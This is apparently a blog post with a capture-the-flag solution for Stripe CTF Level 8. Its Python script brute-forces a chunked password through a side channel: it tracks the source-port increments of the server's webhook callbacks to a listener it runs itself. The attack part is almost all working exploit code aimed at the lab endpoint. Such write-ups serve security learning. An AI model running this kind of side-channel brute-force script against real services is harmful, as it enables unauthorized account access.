code hacking, zen coding

Stripe CTF Level 8 Solution

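A quick solution post for Stripe’s CTF Level 8, written before leaving for vacation. The script below recovers the password three digits at a time by watching how far the source port of the server’s webhook connection advances between guesses.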

#!/usr/bin/env python
# aXs - http://codezen.fr
#
# Stripe CTF Level 8

import time
import requests
import socket
import threading
import SocketServer
import Queue
import json
import random
import sys

remote_port = 0

q = Queue.Queue(maxsize=0)

class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):
  """Measure how far the peer's source port moved since the last callback.

  Each incoming connection is read once, closed, and reduced to a single
  number: its source port minus the source port of the previous connection.
  That number is pushed onto the module-level queue ``q``.
  """

  def handle(self):
    global remote_port
    # Read (and discard) up to 1 KiB; the callback payload itself is not used.
    self.request.recv(1024)
    _, source_port = self.client_address
    # On the very first callback remote_port is still 0, so the step equals
    # the raw port number.
    port_step = source_port - remote_port
    # NOTE(review): remote_port is shared between handler threads without a
    # lock, so overlapping callbacks could interleave these two lines.
    remote_port = source_port
    self.request.close()
    q.put(port_step)

class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
  pass

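if __name__ == "__main__":
  # Driver for one 3-digit chunk of the 12-character password. It is run once
  # per chunk: `chunk` and `found` below are edited by hand between runs.
  #
  # NOTE(review): the published listing had lost the indentation of the inner
  # `while` and `if` bodies, so it did not parse; the nesting below is
  # reconstructed from the statement order.

  # Port 0 means to select an arbitrary unused port
  HOST, PORT = "0.0.0.0", 0

  # Listener that receives the target's webhook connections.
  server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
  ip, port = server.server_address

  # Serve in the background; a daemon thread does not keep the process alive.
  server_thread = threading.Thread(target=server.serve_forever)
  server_thread.daemon = True
  server_thread.start()
  print "Server loop running in thread:", server_thread.name

  endpoint = "https://level08-3.stripe-ctf.com/user-oxtxhpbwuz/"

  # Every 3-digit value, tried in random order.
  numbers = range(0,1000)
  random.shuffle(numbers)

  # Manual override: re-test a short list of earlier candidates instead.
  #numbers = ['641', '243', '093', '589', '728']

  candidate = []

  chunk = 1 # increment after each found chunk
  found = "" # add found chunk here
  level2_ip = "10.0.2.134"  # address the target uses to reach this listener

  while numbers:
    i = int(numbers.pop())
    print "Moving to " + str(i)
    guess = str(i).zfill(3)
    # Already-known chunks + current guess + 'A' padding for the remaining
    # chunks, so the password is always 12 characters; the webhook points
    # back at the listener started above.
    body = '{"password": "' + found + str(guess) + 'A'*((4-chunk)*3) + '", "webhooks": ["' + level2_ip + ':'+str(port)+'"]}'

    # Re-send the same guess until the measured port step lies in
    # 1..chunk+2. Steps outside that range are discarded as noise
    # (presumably unrelated connections made by the target in between, or
    # the first callback, whose step is the raw port number).
    delta = 0
    while delta>(chunk+2) or delta<1:
      resp = requests.post(endpoint, data=body)
      delta = q.get()  # blocks until the handler reports the callback
      result = json.loads(resp.text)
      print resp.text, result
      if result['success'] == True: # true for last chunk only
        print "WIIIIIIIIN"
        sys.exit()

    # A step of exactly chunk+2 marks the guess as a candidate. Presumably the
    # target opens one outbound connection per chunk it verifies before the
    # webhook call and stops at the first wrong chunk, so the step reveals how
    # far verification got -- TODO confirm against the level's server code.
    # Defensive takeaway: verifying every chunk regardless of earlier failures,
    # and not letting the caller pick the callback destination, removes this
    # signal.
    if delta == (chunk+2):
      print "CANDIDATE=", guess, resp.text
      candidate.append(guess)

    print guess + "|" + str(delta)

  print repr(candidate)

  server.shutdown()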